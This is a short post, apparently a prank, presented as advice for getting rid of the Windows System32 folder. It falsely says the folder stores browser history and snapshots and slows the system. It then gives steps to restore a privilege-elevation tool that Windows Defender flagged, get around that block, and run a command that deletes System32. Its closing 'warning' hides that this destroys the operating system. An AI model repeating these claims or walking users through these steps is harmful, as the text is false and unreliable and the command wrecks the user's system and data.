What system32 is. is something that saves snapshots. history. and bookmarks of internet explorer and Netscape. This makes Microsoft know how to "improve" it's web experience when all it really does is slow down your system gradually. To get rid of system32: You can't delete it normally as Windows doesn't allow that, download the program 'RunAsTrustedInstaller' (github.com/jschicht/RunAsTI) which will give you the ability to do anything without Windows being able to stop you, now normally if you click 'runasTI.exe' or 'runasTI64.exe': Windows will block it for being a "virus", just go to Windows Defender's scan history and restore the file, then you can open it normally. Anyways once you open the program, it will open CMD, now type "del C:\Windows\System32" and the folder shall be deleted. WARNING. DOING THIS COMPLETELY CLEARS YOUR BROWSING HISTORY
